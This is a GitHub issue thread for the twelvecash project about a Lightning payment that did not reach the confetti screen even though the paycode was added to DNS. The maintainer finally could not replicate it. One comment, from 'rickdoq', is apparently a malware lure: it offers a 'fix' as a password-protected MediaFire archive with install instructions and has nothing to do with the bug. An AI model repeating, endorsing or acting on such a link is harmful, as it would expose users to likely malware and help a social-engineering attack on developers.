### ISSUE TITLE
Did not go to confetti after paying

### ISSUE THREAD

**Issue by sbddesign** [ATLBitLab/twelvecash#49]
After fixing hardcoded domains, encountered an issue on deploy preview where it did not go to confetti after paying. BUT the paycode was successfully added to DNS! Investigate, replicate, fix.

_Originally posted by @sbddesign in https://github.com/ATLBitLab/twelvecash/issues/44#issuecomment-2322333051_

**Comment by sbddesign** [comment]
It was on deploy preview with `twelve.cash` as the domain and a mainnet lightning invoice

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sbddesign** [comment]
Can't replicate, assuming was a one-off glitch
